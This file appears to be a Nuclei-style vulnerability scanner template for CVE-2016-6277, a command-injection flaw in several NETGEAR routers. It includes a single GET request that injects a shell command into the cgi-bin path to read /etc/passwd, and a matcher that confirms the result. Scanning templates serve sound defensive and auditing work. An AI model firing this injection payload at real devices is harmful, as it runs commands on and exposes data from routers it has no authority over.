34 lines
1.1 KiB
YAML
34 lines
1.1 KiB
YAML
id: CVE-2016-6277
|
|
|
|
info:
|
|
name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
|
|
author: pikpikcu
|
|
severity: high
|
|
description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before
|
|
1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
|
|
reference:
|
|
- https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-6277
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2016-6277
|
|
cwe-id: CWE-352
|
|
tags: cve,cve2016,netgear,rce,iot
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|